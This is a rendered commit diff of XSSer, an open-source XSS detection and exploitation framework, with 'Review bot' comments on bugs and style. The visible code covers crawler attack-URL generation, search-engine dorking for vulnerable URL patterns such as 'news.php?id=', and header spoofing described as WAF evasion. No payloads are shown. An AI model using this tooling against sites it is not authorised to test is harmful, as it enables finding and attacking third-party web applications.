
XSSer v1.8.1 - 'The Hive' release

Author: epsylon, 4 years ago. Commit: b07980f81d
63 changed files with 7130 additions and 4881 deletions
1. .gitignore (+0 -60)
2. LICENSE (+0 -231)
3. xsser/Makefile (+1 -1)
4. README.md (+0 -53)
5. xsser/core/__init__.py (+2 -4)
6. xsser/core/crawler.py (+46 -49)
7. xsser/core/curlcontrol.py (+21 -24)
8. xsser/core/dork.py (+46 -20)
9. xsser/core/encdec.py (+3 -5)
10. xsser/core/flashxss.py (+6 -8)
11. core/fuzzing/DCP.py (+59 -0)
12. xsser/core/fuzzing/DOM.py (+4 -11)
13. xsser/core/fuzzing/HTTPsr.py (+22 -39)
14. xsser/core/fuzzing/__init__.py (+2 -4)
15. core/fuzzing/dorks.txt (+40 -0)
16. xsser/core/fuzzing/heuristic.py (+10 -41)
17. core/fuzzing/user-agents.txt (+0 -0)
18. core/fuzzing/vectors.py (+2612 -0)
19. xsser/core/globalmap.py (+2 -4)
20. xsser/core/gtkcontroller.py (+29 -5)
21. xsser/core/imagexss.py (+5 -12)
22. core/main.py (+3522 -0)
23. xsser/core/mozchecker.py (+2 -4)
24. xsser/core/options.py (+61 -50)
25. xsser/core/post/__init__.py (+2 -4)
26. xsser/core/post/xml_exporter.py (+45 -23)
27. xsser/core/randomip.py (+2 -4)
28. xsser/core/reporter.py (+2 -4)
29. xsser/core/threadpool.py (+19 -9)
30. xsser/core/tokenhub.py (+2 -4)
31. xsser/core/twsupport.py (+2 -4)
32. xsser/core/update.py (+11 -8)
33. doc/AUTHOR (+41 -0)
34. xsser/doc/CHANGELOG (+28 -9)
35. doc/COPYING (+0 -0)
36. xsser/doc/INSTALL (+16 -18)
37. xsser/doc/MANIFESTO (+2 -2)
38. doc/README (+350 -0)
39. doc/requirements.txt (+0 -0)
40. xsser/gtk/docs/about.txt (+20 -16)
41. gtk/docs/wizard0.txt (+16 -0)
42. xsser/gtk/docs/wizard1.txt (+2 -2)
43. gtk/docs/wizard2.txt (+0 -0)
44. gtk/docs/wizard3.txt (+0 -0)
45. gtk/docs/wizard4.txt (+0 -0)
46. gtk/docs/wizard5.txt (+0 -0)
47. gtk/docs/wizard6.txt (+0 -0)
48. gtk/images/world.png (+0 -0)
49. gtk/images/xsser.jpg (+0 -0)
50. gtk/images/xssericon_16x16.png (+0 -0)
51. gtk/images/xssericon_24x24.png (+0 -0)
52. gtk/images/xssericon_32x32.png (+0 -0)
53. xsser/gtk/xsser.desktop (+1 -1)
54. xsser/gtk/xsser.ui (+69 -1)
55. xsser/setup.py (+3 -9)
56. xsser/xsser (+2 -4)
57. xsser/core/fuzzing/DCP.py (+0 -55)
58. xsser/core/fuzzing/dorks.txt (+0 -30)
59. xsser/core/fuzzing/vectors.py (+0 -1145)
60. xsser/core/main.py (+0 -2700)
61. xsser/doc/AUTHOR (+0 -17)
62. xsser/doc/README (+0 -171)
63. xsser/gtk/docs/wizard0.txt (+0 -16)

+ 0 - 60
.gitignore

@@ -1,60 +0,0 @@
-# ---> Python
-# Byte-compiled / optimized / DLL files
-__pycache__/
-*.py[cod]
-*$py.class
-
-# C extensions
-*.so
-
-# Distribution / packaging
-.Python
-env/
-build/
-develop-eggs/
-dist/
-downloads/
-eggs/
-.eggs/
-lib/
-lib64/
-parts/
-sdist/
-var/
-*.egg-info/
-.installed.cfg
-*.egg
-
-# PyInstaller
-#  Usually these files are written by a python script from a template
-#  before PyInstaller builds the exe, so as to inject date/other infos into it.
-*.manifest
-*.spec
-
-# Installer logs
-pip-log.txt
-pip-delete-this-directory.txt
-
-# Unit test / coverage reports
-htmlcov/
-.tox/
-.coverage
-.coverage.*
-.cache
-nosetests.xml
-coverage.xml
-*,cover
-
-# Translations
-*.mo
-*.pot
-
-# Django stuff:
-*.log
-
-# Sphinx documentation
-docs/_build/
-
-# PyBuilder
-target/
-
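Review bot: deleting .gitignore outright means `__pycache__/`, `*.py[cod]`, `build/`, `dist/` and `*.egg-info/` are no longer excluded, so the next `make source` or packaging build can leave artefacts staged for commit. If the file is being dropped because of the directory reshuffle in this commit, keep it (or a copy under `xsser/`) rather than removing the rules.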

File diff suppressed because it is too large
+ 0 - 231
LICENSE
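Review bot: the 231-line top-level LICENSE is removed with no replacement visible in this diff; the file list does show doc/COPYING, so confirm that file carries the full GPLv3 text the deleted README.md linked to, since a repository root without a license file is the first thing packagers flag.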


+ 1 - 1
xsser/Makefile

@@ -4,7 +4,7 @@ PYTHON=`which python`
 DESTDIR=/
 DESTDIR=/
 BUILDIR=$(CURDIR)/debian/xsser
 BUILDIR=$(CURDIR)/debian/xsser
 PROJECT=xsser
 PROJECT=xsser
-VERSION=0.7.0
+VERSION=1.8.1
 
 
 all:
 all:
 	@echo "make source - Create source package"
 	@echo "make source - Create source package"
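Review bot: the version is bumped to 1.8.1 here, but the same string is normally carried in xsser/setup.py, xsser/core/update.py and xsser/gtk/docs/about.txt, all of which are in this commit's file list; verify they were bumped to the same value so the package metadata and the in-app version agree.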

+ 0 - 53
README.md

@@ -1,53 +0,0 @@
-  ![XSSer](https://xsser.03c8.net/xsser/zika1.png "XSSerBanner")
-
-=================================================================== 
-
- Cross Site "Scripter" (aka XSSer) is an automatic -framework- to detect, exploit and report XSS vulnerabilities.
-
-----------
-
- XSSer is released under the GPLv3. You can find the full license text
-in the [COPYING](./xsser/doc/COPYING) file.
-
-----------
-
- + Web:  https://xsser.03c8.net
-
-----------
-
-  ![XSSer](https://xsser.03c8.net/xsser/zika2.png "XSSerManifesto")
-
-#### Installing:
-
- XSSer runs on many platforms. It requires Python and the following libraries:
-
-    - python-pycurl - Python bindings to libcurl
-    - python-xmlbuilder - create xml/(x)html files - Python 2.x
-    - python-beautifulsoup - error-tolerant HTML parser for Python
-    - python-geoip - Python bindings for the GeoIP IP-to-country resolver library
-
- On Debian-based systems (ex: Ubuntu), run: 
-
-    sudo apt-get install python-pycurl python-xmlbuilder python-beautifulsoup python-geoip
-
- On other systems such as: Kali, Ubuntu, ArchLinux, ParrotSec, Fedora, etc... also run:
-
-       pip install geoip 
-
-####  Source libs:
-
-       * Python: https://www.python.org/downloads/
-       * PyCurl: http://pycurl.sourceforge.net/
-       * PyBeautifulSoup: https://pypi.python.org/pypi/BeautifulSoup
-       * PyGeoIP: https://pypi.python.org/pypi/GeoIP
-
-----------
-
-####  Screenshots:
-
-  ![XSSer](https://xsser.03c8.net/xsser/url_generation.png "XSSerSchema")
-
-  ![XSSer](https://xsser.03c8.net/xsser/zika3.png "XSSerAdvanced")
-
-  ![XSSer](https://xsser.03c8.net/xsser/zika4.png "XSSerGeoMap")
-
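Review bot: README.md is deleted without a stub, so the repository landing page loses the dependency list (python-pycurl, python-xmlbuilder, python-beautifulsoup, python-geoip) and the install commands; the file list shows a 350-line doc/README being added, so leave a short README.md that links to it. The deleted text also records that python-xmlbuilder is Python 2.x only, which should survive wherever the install notes move.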

+ 2 - 4
xsser/core/__init__.py

@@ -1,9 +1,7 @@
 """
 """
-$Id$
+This file is part of the XSSer project, https://xsser.03c8.net
 
 
-This file is part of the xsser project, http://xsser.03c8.net
-
-Copyright (c) 2011/2016 psy <epsylon@riseup.net>
+Copyright (c) 2010/2019 | psy <epsylon@riseup.net>
 
 
 xsser is free software; you can redistribute it and/or modify it under
 xsser is free software; you can redistribute it and/or modify it under
 the terms of the GNU General Public License as published by the Free
 the terms of the GNU General Public License as published by the Free
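Review bot: the copyright span changes from 2011/2016 to 2010/2019, i.e. the start year moves back a year; confirm 2010 is intended. The same header edit (and the removal of the `$Id$` keyword line) is repeated in crawler.py, curlcontrol.py, dork.py, encdec.py and flashxss.py below and in the new DCP.py, so one wrong year propagates to every file.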

+ 46 - 49
xsser/core/crawler.py

@@ -2,11 +2,9 @@
 # -*- coding: utf-8 -*-"
 # -*- coding: utf-8 -*-"
 # vim: set expandtab tabstop=4 shiftwidth=4:
 # vim: set expandtab tabstop=4 shiftwidth=4:
 """
 """
-$Id$
+This file is part of the XSSer project, https://xsser.03c8.net
 
 
-This file is part of the xsser project, http://xsser.03c8.net
-
-Copyright (c) 2011/2016 psy <epsylon@riseup.net>
+Copyright (c) 2010/2019 | psy <epsylon@riseup.net>
 
 
 xsser is free software; you can redistribute it and/or modify it under
 xsser is free software; you can redistribute it and/or modify it under
 the terms of the GNU General Public License as published by the Free
 the terms of the GNU General Public License as published by the Free
@@ -40,14 +38,10 @@ class EmergencyLanding(Exception):
 class Crawler(object):
 class Crawler(object):
     """
     """
     Crawler class.
     Crawler class.
-
-    Crawls a webpage looking for url arguments.
-    Dont call from several threads! You should create a new one
-    for every thread.
     """
     """
     def __init__(self, parent, curlwrapper=None, crawled=None, pool=None):
     def __init__(self, parent, curlwrapper=None, crawled=None, pool=None):
         # verbose: 0-no printing, 1-prints dots, 2-prints full output
         # verbose: 0-no printing, 1-prints dots, 2-prints full output
-        self.verbose = 1
+        self.verbose = 0
         self._parent = parent
         self._parent = parent
         self._to_crawl = []
         self._to_crawl = []
         self._parse_external = True
         self._parse_external = True
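Review bot: the docstring warning that a Crawler must not be shared between threads is removed, but nothing in this hunk makes the class reentrant (`_to_crawl`, `_found_args` and the pool remain per-instance mutable state), so keep the caveat. Separately, `self.verbose` silently changes from 1 to 0, which turns off the progress dots for every caller; if that is the intended default, expose it as a constructor argument instead of hard-coding it.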
@@ -81,7 +75,10 @@ class Crawler(object):
         find parameters in given url.
         find parameters in given url.
         """
         """
         parsed = urllib2.urlparse.urlparse(url)
         parsed = urllib2.urlparse.urlparse(url)
-        qs = urlparse.parse_qs(parsed.query)
+        if "C=" in parsed.query and "O=" in  parsed.query:
+            qs = ""
+        else:
+            qs = urlparse.parse_qs(parsed.query)
         if parsed.scheme:
         if parsed.scheme:
             path = parsed.scheme + "://" + parsed.netloc + parsed.path
             path = parsed.scheme + "://" + parsed.netloc + parsed.path
         else:
         else:
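Review bot: the new `"C=" in parsed.query and "O=" in parsed.query` test is a substring match on the raw query string, so any parameter name ending in C or O (e.g. `?PIC=1&FOO=2`) is mistaken for a directory-index sort link and skipped. Parse first and test the keys (`qs = urlparse.parse_qs(parsed.query)` then `if 'C' in qs and 'O' in qs: qs = {}`), and use `{}` rather than `""` so `qs` keeps the dict type the rest of the function expects. A comment naming what the C=/O= pair is (presumably Apache autoindex sorting) would help the next reader.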
@@ -92,6 +89,14 @@ class Crawler(object):
             if not zipped or not path in zipped[0]:
             if not zipped or not path in zipped[0]:
                 self._found_args[key].append([path, url])
                 self._found_args[key].append([path, url])
                 self.generate_result(arg_name, path, url)
                 self.generate_result(arg_name, path, url)
+        if not qs:
+            parsed = urllib2.urlparse.urlparse(url)
+            if path.endswith("/"):
+                attack_url = path + "XSS"
+            else:
+                attack_url = path + "/XSS"
+            if not attack_url in self._parent.crawled_urls:
+                self._parent.crawled_urls.append(attack_url)
         ncurrent = sum(map(lambda s: len(s), self._found_args.values()))
         ncurrent = sum(map(lambda s: len(s), self._found_args.values()))
         if ncurrent >= self._max:
         if ncurrent >= self._max:
             self._armed = False
             self._armed = False
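Review bot: inside the new `if not qs:` block the `parsed = urllib2.urlparse.urlparse(url)` line is dead (`parsed` was already computed above and is not used afterwards), so drop it. More importantly the block appends a probe URL to `self._parent.crawled_urls` for every parameter-less link, while the `_max` check that follows only counts `_found_args`; add a `len(self._parent.crawled_urls) >= self._max` check here as well so a large site cannot push the list far past the limit before `_get_done` raises `EmergencyLanding`.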
@@ -121,6 +126,7 @@ class Crawler(object):
         attack_urls = []
         attack_urls = []
         if not self._parent._landing and self._armed:
         if not self._parent._landing and self._armed:
             self._crawl(basepath, path, depth, width)
             self._crawl(basepath, path, depth, width)
+            # now parse all found items
             if self._ownpool:
             if self._ownpool:
                 self.pool.dismissWorkers(len(self.pool.workers))
                 self.pool.dismissWorkers(len(self.pool.workers))
                 self.pool.joinAllDismissedWorkers()
                 self.pool.joinAllDismissedWorkers()
@@ -138,7 +144,7 @@ class Crawler(object):
         for key, val in qs.iteritems():
         for key, val in qs.iteritems():
             qs_joint[key] = val[0]
             qs_joint[key] = val[0]
         attack_qs = dict(qs_joint)
         attack_qs = dict(qs_joint)
-        attack_qs[arg_name] = "VECTOR"
+        attack_qs[arg_name] = "XSS"
         attack_url = path + '?' + urllib.urlencode(attack_qs)
         attack_url = path + '?' + urllib.urlencode(attack_qs)
         if not attack_url in self._parent.crawled_urls:
         if not attack_url in self._parent.crawled_urls:
             self._parent.crawled_urls.append(attack_url)
             self._parent.crawled_urls.append(attack_url)
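Review bot: the marker substituted into generated attack URLs changes from `VECTOR` to `XSS`; every consumer that later replaces that placeholder (core/main.py is rewritten in this same commit) must be updated to the same token, otherwise URLs built here are never substituted. Note also that `XSS` is a plausible literal value in real query strings, whereas `VECTOR` was less likely to collide with genuine parameter values.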
@@ -178,37 +184,35 @@ class Crawler(object):
         self._get_done(basepath, depth, width, path, res, c_info)
         self._get_done(basepath, depth, width, path, res, c_info)
 
 
     def _get_error(self, request, error):
     def _get_error(self, request, error):
-        try:
-            path, depth, width, basepath = request.args[0]
-            e_type, e_value, e_tb = error
-            if e_type == pycurl.error:
-                errno, message = e_value.args
-                if errno == 28:
-                    print("requests pyerror -1")
-                    self.enqueue_jobs()
-                    self._requests.remove(path)
-                    return # timeout
-                else:
-                    self.report('crawler curl error: '+message+' ('+str(errno)+')')
-            elif e_type == EmergencyLanding:
-                pass
+        path, depth, width, basepath = request.args[0]
+        e_type, e_value, e_tb = error
+        if e_type == pycurl.error:
+            errno, message = e_value.args
+            if errno == 28:
+                print("requests pyerror -1")
+                self.enqueue_jobs()
+                self._requests.remove(path)
+                return # timeout
             else:
             else:
-                traceback.print_tb(e_tb)
-                self.report('crawler error: '+str(e_value)+' '+path)
-            if not e_type == EmergencyLanding:
-                for reporter in self._parent._reporters:
-                    reporter.mosquito_crashed(path, str(e_value))
-            self.enqueue_jobs()
-            self._requests.remove(path)
-        except:
-            return
+                self.report('crawler curl error: '+message+' ('+str(errno)+')')
+        elif e_type == EmergencyLanding:
+            pass
+        else:
+            traceback.print_tb(e_tb)
+            self.report('crawler error: '+str(e_value)+' '+path)
+        if not e_type == EmergencyLanding:
+            for reporter in self._parent._reporters:
+                reporter.mosquito_crashed(path, str(e_value))
+        self.enqueue_jobs()
+        self._requests.remove(path)
 
 
     def _emergency_parse(self, html_data, start=0):
     def _emergency_parse(self, html_data, start=0):
         links = set()
         links = set()
         pos = 0
         pos = 0
-        if not html_data:
-            return
-        data_len = len(html_data)
+        try:
+            data_len = len(html_data)
+        except:
+            data_len = html_data
         while pos < data_len:
         while pos < data_len:
             if len(links)+start > self._max:
             if len(links)+start > self._max:
                 break
                 break
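Review bot: dropping the blanket `try/except: return` around `_get_error` is an improvement, but the two tuple unpacks (`request.args[0]` and `e_value.args`) can now raise inside the error callback itself, which the thread pool will not surface; guard them explicitly. In `_emergency_parse`, `except: data_len = html_data` assigns the original object (possibly `None`) to `data_len`, and `while pos < data_len` then compares an int against it; use `data_len = 0` (or `return links`) in that branch so the loop bound is always numeric, and narrow the bare `except:` to `TypeError`.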
@@ -236,7 +240,7 @@ class Crawler(object):
                 next_job = self._to_crawl.pop()
                 next_job = self._to_crawl.pop()
                 self._crawl(*next_job)
                 self._crawl(*next_job)
 
 
-    def _get_done(self, basepath, depth, width, path, html_data, content_type): # request, result):
+    def _get_done(self, basepath, depth, width, path, html_data, content_type):
         if not self._armed or len(self._parent.crawled_urls) >= self._max:
         if not self._armed or len(self._parent.crawled_urls) >= self._max:
             raise EmergencyLanding
             raise EmergencyLanding
         try:
         try:
@@ -244,27 +248,23 @@ class Crawler(object):
         except:
         except:
             encoding = None
             encoding = None
         try:
         try:
-            soup = BeautifulSoup(html_data, from_encoding=encoding)
+            soup = BeautifulSoup(html_data, fromEncoding=encoding)
             links = None
             links = None
         except:
         except:
             soup = None
             soup = None
             links = self._emergency_parse(html_data)
             links = self._emergency_parse(html_data)
-
         for reporter in self._parent._reporters:
         for reporter in self._parent._reporters:
             reporter.start_crawl(path)
             reporter.start_crawl(path)
-
         if not links and soup:
         if not links and soup:
-            links = soup.find_all('a')
-            forms = soup.find_all('form')
-
+            links = soup.findAll('a')
+            forms = soup.findAll('form')
             for form in forms:
             for form in forms:
                 pars = {}
                 pars = {}
                 if form.has_key("action"):
                 if form.has_key("action"):
                     action_path = urlparse.urljoin(path, form["action"])
                     action_path = urlparse.urljoin(path, form["action"])
                 else:
                 else:
                     action_path = path
                     action_path = path
-                for input_par in form.find_all('input'):
-
+                for input_par in form.findAll('input'):
                     if not input_par.has_key("name"):
                     if not input_par.has_key("name"):
                         continue
                         continue
                     value = "foo"
                     value = "foo"
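Review bot: `fromEncoding`, `findAll` and the surrounding `has_key` calls are the BeautifulSoup 3 spellings; bs4 accepts `findAll` and `fromEncoding` only as deprecated aliases, so this hunk effectively pins the crawler to the old `python-beautifulsoup` package (the one the deleted README.md listed). Either state that dependency explicitly in the install docs and setup.py, or keep the bs4 names (`from_encoding`, `find_all`, `has_attr`) and pin bs4 instead; mixing the two leaves the import that works depending on which package happens to be installed.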
@@ -284,8 +284,6 @@ class Crawler(object):
         elif self.verbose:
         elif self.verbose:
             sys.stdout.write(".")
             sys.stdout.write(".")
             sys.stdout.flush()
             sys.stdout.flush()
-        if not links:
-            return
         if len(links) > self._max:
         if len(links) > self._max:
             links = links[:self._max]
             links = links[:self._max]
         for a in links:
         for a in links:
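Review bot: with the `if not links: return` guard removed, `links` must be non-empty and sliceable here, but when BeautifulSoup fails `links` comes from `_emergency_parse`, which returns a `set`; `links[:self._max]` on the next context line raises `TypeError` for a set. Convert with `links = list(links)` before the length check, and keep an early `return` for the empty case.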
@@ -323,7 +321,6 @@ class Crawler(object):
             self._find_args(href)
             self._find_args(href)
             for reporter in self._parent._reporters:
             for reporter in self._parent._reporters:
                 reporter.add_link(path, href)
                 reporter.add_link(path, href)
-            self.report("\n[Info] Spidering: " + str(href))
             if self._armed and depth>0:
             if self._armed and depth>0:
                 if len(self._to_crawl) < self._max:
                 if len(self._to_crawl) < self._max:
                     self._to_crawl.append([basepath, href, depth-1, width])
                     self._to_crawl.append([basepath, href, depth-1, width])
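Review bot: the `Spidering:` report line is deleted outright; if the intent is to quieten output, gate it on `self.verbose` (the flag this commit also sets to 0) so users can still opt in to seeing which links the crawler follows.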

+ 21 - 24
xsser/core/curlcontrol.py

@@ -2,11 +2,9 @@
 # -*- coding: utf-8 -*-"
 # -*- coding: utf-8 -*-"
 # vim: set expandtab tabstop=4 shiftwidth=4:
 # vim: set expandtab tabstop=4 shiftwidth=4:
 """
 """
-$Id$
+This file is part of the XSSer project, https://xsser.03c8.net
 
 
-This file is part of the xsser project, http://xsser.03c8.net
-
-Copyright (c) 2011/2018 psy <epsylon@riseup.net>
+Copyright (c) 2010/2019 | psy <epsylon@riseup.net>
 
 
 xsser is free software; you can redistribute it and/or modify it under
 xsser is free software; you can redistribute it and/or modify it under
 the terms of the GNU General Public License as published by the Free
 the terms of the GNU General Public License as published by the Free
@@ -469,38 +467,37 @@ class Curl:
         """
         """
         Print selected options.
         Print selected options.
         """
         """
-        print "\n[-]Verbose: active"
-        print "[-]Cookie:", cls.cookie
-        print "[-]HTTP User Agent:", cls.agent
-        print "[-]HTTP Referer:", cls.referer
-        print "[-]Extra HTTP Headers:", cls.headers
+        print "\nCookie:", cls.cookie
+        print "User Agent:", cls.agent
+        print "Referer:", cls.referer
+        print "Extra Headers:", cls.headers
         if cls.xforw == True:
         if cls.xforw == True:
-            print "[-]X-Forwarded-For:", "Random IP"
+            print "X-Forwarded-For:", "Random IP"
         else:
         else:
-            print "[-]X-Forwarded-For:", cls.xforw
+            print "X-Forwarded-For:", cls.xforw
         if cls.xclient == True:
         if cls.xclient == True:
-            print "[-]X-Client-IP:", "Random IP"
+            print "X-Client-IP:", "Random IP"
         else:
         else:
-            print "[-]X-Client-IP:", cls.xclient
-        print "[-]Authentication Type:", cls.atype
-        print "[-]Authentication Credentials:", cls.acred
+            print "X-Client-IP:", cls.xclient
+        print "Authentication Type:", cls.atype
+        print "Authentication Credentials:", cls.acred
         if cls.ignoreproxy == True:
         if cls.ignoreproxy == True:
-            print "[-]Proxy:", "Ignoring system default HTTP proxy"
+            print "Proxy:", "Ignoring system default HTTP proxy"
         else:
         else:
-            print "[-]Proxy:", cls.proxy
-        print "[-]Timeout:", cls.timeout
+            print "Proxy:", cls.proxy
+        print "Timeout:", cls.timeout
         if cls.tcp_nodelay == True:
         if cls.tcp_nodelay == True:
-            print "[-]Delaying:", "TCP_NODELAY activate"
+            print "Delaying:", "TCP_NODELAY activate"
         else:
         else:
-            print "[-]Delaying:", cls.delay, "seconds"
+            print "Delaying:", cls.delay, "seconds"
         if cls.followred == True:
         if cls.followred == True:
-            print "[-]Follow 302 code:", "active"
+            print "Follow 302 code:", "active"
             if cls.fli:
             if cls.fli:
-                print"[-]Limit to follow:", cls.fli
+                print"Limit to follow:", cls.fli
         else:
         else:
-            print "[-]Delaying:", cls.delay, "seconds"
+            print "Delaying:", cls.delay, "seconds"
 
 
-        print "[-]Retries:", cls.retries, "\n"
+        print "Retries:", cls.retries, "\n"
 
 
     def answered(self, check):
     def answered(self, check):
         """
         """
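Review bot: the `else` branch of the `followred` check still prints `"Delaying:", cls.delay, "seconds"`, duplicating the line printed a few lines earlier in the `tcp_nodelay` branch; this looks like a copy-paste slip carried over while the `[-]` prefixes were stripped, and should presumably report the follow-redirect state (e.g. `print "Follow 302 code:", "inactive"`). Also, `print"Limit to follow:"` is missing the space after `print`; it parses, but is inconsistent with the surrounding lines.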

+ 46 - 20
xsser/core/dork.py

@@ -2,9 +2,9 @@
 # -*- coding: utf-8 -*-"
 # -*- coding: utf-8 -*-"
 # vim: set expandtab tabstop=4 shiftwidth=4:
 # vim: set expandtab tabstop=4 shiftwidth=4:
 """
 """
-This file is part of the xsser project, https://xsser.03c8.net
+This file is part of the XSSer project, https://xsser.03c8.net
 
 
-Copyright (c) 2011/2016/2018 psy <epsylon@riseup.net>
+Copyright (c) 2010/2019 | psy <epsylon@riseup.net>
 
 
 xsser is free software; you can redistribute it and/or modify it under
 xsser is free software; you can redistribute it and/or modify it under
 the terms of the GNU General Public License as published by the Free
 the terms of the GNU General Public License as published by the Free
@@ -22,18 +22,22 @@ Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
 
 
 List of search engines: http://en.wikipedia.org/wiki/List_of_search_engines
 List of search engines: http://en.wikipedia.org/wiki/List_of_search_engines
 
 
+Currently supported: duck(default), startpage, yahoo, bing
+
 """
 """
-import urllib2, traceback, re, random
+import urllib2, traceback, re, random, urllib
 urllib2.socket.setdefaulttimeout(5.0)
 urllib2.socket.setdefaulttimeout(5.0)
 
 
 DEBUG = 0
 DEBUG = 0
 
 
 class Dorker(object):
 class Dorker(object):
-    def __init__(self, engine='yahoo'):
+    def __init__(self, engine='duck'):
         self._engine = engine
         self._engine = engine
         self.search_engines = [] # available dorking search engines
         self.search_engines = [] # available dorking search engines
-        self.search_engines.append('bing')
+        self.search_engines.append('duck')
+        self.search_engines.append('startpage')
         self.search_engines.append('yahoo')
         self.search_engines.append('yahoo')
+        self.search_engines.append('bing')
         self.agents = [] # user-agents
         self.agents = [] # user-agents
         try:
         try:
             f = open("core/fuzzing/user-agents.txt").readlines() # set path for user-agents
             f = open("core/fuzzing/user-agents.txt").readlines() # set path for user-agents
@@ -46,35 +50,57 @@ class Dorker(object):
         """
         """
         Perform a search and return links.
         Perform a search and return links.
         """
         """
-        if self._engine == 'bing': # works at 20-02-2011 -> 19-02-2016 -> 09-04-2018
-            search_url = 'https://www.bing.com/search?q="' + search + '"'
-        elif self._engine == 'yahoo': # works at 20-02-2011 -> 19-02-2016 -> -> 09-04-2018
-            search_url = 'https://search.yahoo.com/search?q="' + search + '"'
+        if self._engine == 'bing': # works at 20-02-2011 -> 19-02-2016 -> 09-04-2018 -> 26-08-2019
+            search_url = 'https://www.bing.com/search?q="' + str(search) + '"'
+            print "\nSearching query:", urllib2.unquote(search_url)
+        elif self._engine == 'yahoo': # works at 20-02-2011 -> 19-02-2016 -> -> 09-04-2018 -> 26-08-2019
+            search_url = 'https://search.yahoo.com/search?q="' + str(search) + '"'
+            print "\nSearching query:", urllib2.unquote(search_url)
+        elif self._engine == 'duck': # works at 26-08-2019
+            search_url = 'https://duckduckgo.com/html/' 
+            q = 'instreamset:(url):"' + str(search) + '"' # set query to search literally on results
+            query_string = { 'q':q }
+            print "\nSearching query:", urllib2.unquote(search_url) + " [POST: (" + q + ")]"
+        elif self._engine == 'startpage': # works at 26-08-2019
+            search_url = 'https://www.startpage.com/do/asearch'
+            q = 'url:"' + str(search) + '"' # set query to search literally on results
+            query_string = { 'cmd':'process_search', 'query':q }
+            print "\nSearching query:", urllib2.unquote(search_url) + " [POST: (" + q + ")]"
         else:
         else:
-            print "\n[Error] This search engine is not supported!\n" 
-            print "[Info] List of available:"
-            print '-'*25
+            print "\n[Error] This search engine is not being supported!\n"
+            print '-'*25 
+            print "\n[Info] Use one from this list:\n"
             for e in self.search_engines:
             for e in self.search_engines:
                 print "+ "+e
                 print "+ "+e
-            print ""
+            print "\n ex: xsser -d 'profile.asp?num=' --De 'duck'"
+            print " ex: xsser -l --De 'startpage'"
+            print "\n[Info] Or try them all:\n\n ex: xsser -d 'news.php?id=' --Da\n"
         try:
         try:
             self.search_url = search_url
             self.search_url = search_url
-            print "\n[Info] Search query:", urllib2.unquote(search_url)
             user_agent = random.choice(self.agents).strip() # set random user-agent
             user_agent = random.choice(self.agents).strip() # set random user-agent
             referer = '127.0.0.1' # set referer to localhost / WAF black magic!
             referer = '127.0.0.1' # set referer to localhost / WAF black magic!
             headers = {'User-Agent' : user_agent, 'Referer' : referer}
             headers = {'User-Agent' : user_agent, 'Referer' : referer}
-            req = urllib2.Request(search_url, None, headers)
+            if self._engine == 'bing' or self._engine == 'yahoo': # using GET
+                req = urllib2.Request(search_url, None, headers)
+            elif self._engine == 'duck' or self._engine == 'startpage': # using POST
+                data = urllib.urlencode(query_string)
+                req = urllib2.Request(search_url, data, headers)
             html_data = urllib2.urlopen(req).read()
             html_data = urllib2.urlopen(req).read()
             print "\n[Info] Retrieving requested info..."
             print "\n[Info] Retrieving requested info..."
         except urllib2.URLError, e:
         except urllib2.URLError, e:
             if DEBUG:
             if DEBUG:
                 traceback.print_exc()
                 traceback.print_exc()
             print "\n[Error] Cannot connect!"
             print "\n[Error] Cannot connect!"
+            print "\n" + "-"*50
             return
             return
         if self._engine == 'bing':
         if self._engine == 'bing':
-            regex = '<h2><a href="(.+?)" h=' # regex magics 09-04/2018
+            regex = '<h2><a href="(.+?)" h=' # regex magics 08/2019
         if self._engine == 'yahoo':
         if self._engine == 'yahoo':
-            regex = 'RU=(.+?)/RK=' # regex magics [09/04/2018]
+            regex = 'RU=(.+?)/RK=' # regex magics 08/2019
+        if self._engine == 'duck':
+            regex = '<a class="result__url" href="(.+?)">' # regex 08/2019
+        if self._engine == 'startpage':
+            regex = 'target="_blank">(.+?)</a>' # regex magics 08/2019
         pattern = re.compile(regex)
         pattern = re.compile(regex)
         links = re.findall(pattern, html_data)
         links = re.findall(pattern, html_data)
         found_links = []
         found_links = []
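Review bot: the unsupported-engine `else` branch prints the list of engines but does not `return`, so execution falls into the `try` block where `search_url` (and, for the POST path, `query_string`) are unbound and raise `NameError`, which the `except urllib2.URLError` does not catch; add `return []` at the end of that branch. Two smaller points: the `# works at ...` date comments will go stale quickly and belong in the CHANGELOG, and the startpage regex `target="_blank">(.+?)</a>` captures the anchor text rather than the `href`, so it returns link titles, not URLs, unless that markup happens to put the URL in the text.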
@@ -90,14 +116,14 @@ class Dorker(object):
                     if link2 not in found_links: # parse that target is not duplicated
                     if link2 not in found_links: # parse that target is not duplicated
                         found_links.append(link)
                         found_links.append(link)
         else:
         else:
-            print "\n[Info] Not any link found for that query!"
+            print "\n[Error] Not any link found for that query!"
         return found_links
         return found_links
 
 
 if __name__ == '__main__':
 if __name__ == '__main__':
-    for a in ['yahoo', 'bing']:
+    for a in ['bing', 'yahoo', 'duck', 'startpage']: # working at: 28/08/2019
         dork = Dorker(a)
         dork = Dorker(a)
         res = dork.dork("news.php?id=")
         res = dork.dork("news.php?id=")
         if res:
         if res:
-            print "[+]", a, ":", len(res), "\n"
+            print "\n[+] Search Engine:", a, "| Found: ", len(res), "\n"
             for b in res:
             for b in res:
                 print " *", b
                 print " *", b
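Review bot: `[Error] Not any link found for that query!` is ungrammatical and an empty result is a normal outcome rather than an error; suggest `[Info] No links found for that query`. The `__main__` self-test now queries four live search engines, so keep it out of any automated test run.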

+ 3 - 5
xsser/core/encdec.py

@@ -2,11 +2,9 @@
 # -*- coding: utf-8 -*-"
 # -*- coding: utf-8 -*-"
 # vim: set expandtab tabstop=4 shiftwidth=4:
 # vim: set expandtab tabstop=4 shiftwidth=4:
 """
 """
-$Id$
+This file is part of the XSSer project, https://xsser.03c8.net
 
 
-This file is part of the xsser project, http://xsser.03c8.net
-
-Copyright (c) 2011/2016 psy <epsylon@riseup.net>
+Copyright (c) 2010/2019 | psy <epsylon@riseup.net>
 
 
 xsser is free software; you can redistribute it and/or modify it under
 xsser is free software; you can redistribute it and/or modify it under
 the terms of the GNU General Public License as published by the Free
 the terms of the GNU General Public License as published by the Free
@@ -102,7 +100,7 @@ class EncoderDecoder(object):
     def _ipOctalEncode(self, string):
     def _ipOctalEncode(self, string):
         """
         """
         Encode to octal.
         Encode to octal.
-	"""
+    	"""
         encoded=''
         encoded=''
         tblIP = string.split('.')
         tblIP = string.split('.')
         # In the case it's not an IP
         # In the case it's not an IP
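Review bot: the reindented closing `"""` still mixes four spaces with a tab, which contradicts the `vim: set expandtab` modeline at the top of the file and renders differently depending on tab width; use eight spaces so it lines up with the docstring body.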

+ 6 - 8
xsser/core/flashxss.py

